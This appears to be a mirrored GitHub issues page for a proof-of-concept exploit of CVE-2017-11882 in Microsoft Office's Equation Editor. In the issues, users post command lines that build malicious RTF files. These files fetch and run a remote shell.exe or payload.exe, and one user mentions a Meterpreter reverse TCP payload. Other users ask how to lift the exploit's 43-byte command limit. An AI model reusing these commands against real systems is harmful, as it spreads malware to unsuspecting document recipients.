GithubHelp home page GithubHelp logo

cve-2017-11882's People

Contributors

ar7z1 avatar kkkkkii avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

newlog lxpe qsdj yeyintminthuhtut johnjohnsp1 redwifiteam zhouat beyondcy bb33bb walterjia pwd120 b1gw00d awesome-security cr2zyivan kungia09 0irebrwe tobey123 minkione akpotter msr00t jingqiangliu axiao111 h4ck0ne libconch aihuiivy bongbongco feniczy ruadmjn knooow webshell520 lw1988 afudadi snemes jerusalemsbell lovebair2022 samyoyo akamajoris hkylin 957204459 kuteminh11 voraka raul1718 selfevo blacktrace 90yongxucai lins hawking2013 temesgeny cclauss awesome-archive xingdong yongliangw mel0day podvps andyhao567 gizakor expertasif yzpku ahoo5045 tsondt hoangcuongflp avgirl binddns datuqiqi kyhvedn vf3ng peterpt gdraperi c0de3 ar7z1 biitt deelmind houcy nettao hzhikui wllidr kbahaxor thecodearchiveproject unforeseenocean delovt myexploite michaelcranevong souldestroyer milamber31337 tracesrc huakaii liggle123 xxnbyy smnra hackmycontrolsystem hackntkt secretnonempty rxwx null0x4d5a de8gman1990 own2pwn putuoka ziceptor hellhit h3ku

cve-2017-11882's Issues

Script argument question

Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script: python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf. Otherwise, if I did this: python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf, I would get an error from Word saying could not find resource from \192.168.x.xwebdav. It appears that the python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse tcp payload. However, when I enter the WebDAV path in Windows using win+R, Windows somehow opens ups the webdav location in explorer before the meterpreter session could be established. Is anyone else or you experiencing this? Is this normal behavior?

Are Equation Editors from other Vendors also affected?

As Desig Science licenced their reduced equation editor not only to microsoft, but to other vendor's, the question arrises if their equation editor is also vulnerable.

Is there a simple way to be sure?

In order to name just a few:
XP Tech Equation 2
SoftMaker Formeleditor
Corel Equation 2.0
GRAMS Equation 2.1
Sakbr Software Equation 2.1

about exploit

Hi
can you please explain how to to use this POC
i tried many ways it's not working
i mean with real payload not calc.exe

python webdav_exec_CVE-2017-11882.py -u http://192.168.1.166/payload.exe -e payload.exe -o test.rtf

but it's show me error

Traceback (most recent call last):
File "webdav_exec_CVE-2017-11882.py", line 152, in
rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
File "webdav_exec_CVE-2017-11882.py", line 137, in create_rtf
ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
File "webdav_exec_CVE-2017-11882.py", line 129, in create_ole_exec_primitive
raise ValueError("primitive command must be shorter than 43 bytes")
ValueError: primitive command must be shorter than 43 bytes

Thanks

about code programm

Why is the maximum size of the request equal to 43?
How to increase its size?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.